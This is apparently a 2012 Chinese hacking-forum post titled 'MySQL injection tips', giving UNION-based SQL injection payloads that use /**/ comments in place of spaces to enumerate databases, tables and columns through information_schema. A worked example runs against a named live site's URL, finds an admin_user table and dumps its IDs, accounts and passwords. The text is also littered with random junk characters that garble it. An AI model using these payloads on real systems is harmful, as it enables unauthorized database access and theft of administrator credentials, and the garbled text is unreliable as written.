中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库
. M# [( ^# V4 u7 P5 k- H: k2 t2 Y$ R6 u% H2 Y* \5 W' p
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*1 i3 ~' o* R: @: l% j8 `" u; ?

) [" `/ ]: i6 g) ?2 ~查表1 F* R5 U/ z1 F4 O% d) p6 S9 E, _8 n; k

. u- ^, V1 K6 e$ [id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1: [/ i  X0 e# }$ E  R
9 Y( A1 G0 e2 ^. D/ J& ?
查段
8 [' o- x% g& V' w5 q% R: j9 O; ^0 [* z2 Z1 u: Q9 T  _
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
) g" T; p8 X+ G$ _' a, ]8 w  W+ T4 G+ L: N: T" j$ F

1 F+ @. F( A% P, b# c) amysql5高级注入方法暴表' k5 t. N4 R3 H' a3 e: w
2 U3 ~6 B) x5 `4 w7 \0 X  w! K; D
例子如下:& f0 s' d! Q8 ], c' X" ^$ d

: b3 V# O6 h3 Y' g! t6 @" C1.爆表
; S) W; V. \' `5 ?+ ~9 M! dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
& M% h9 n1 @  C$ c0 Q7 D4 x这样爆到第4个时出现了admin_user表。
& n: s& s9 D9 Y( J$ D6 Y- f
/ M) H1 r0 v8 @9 Z6 ]2.暴字段8 F2 a  v; |+ L, C
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*' a" t/ @: U; I9 g( k9 t& h

" |6 n8 ?5 C! s( A- _. V8 T4 v  w% P3 y4 h* u
3.爆密码
4 T4 c( o6 v) c3 Z0 _http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ! @% G1 E/ u, j+ N& Q% s3 R4 _
, F1 t% h7 D5 F  |$ m
2 F( b, @7 K5 N  |- j  f4 w) {





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2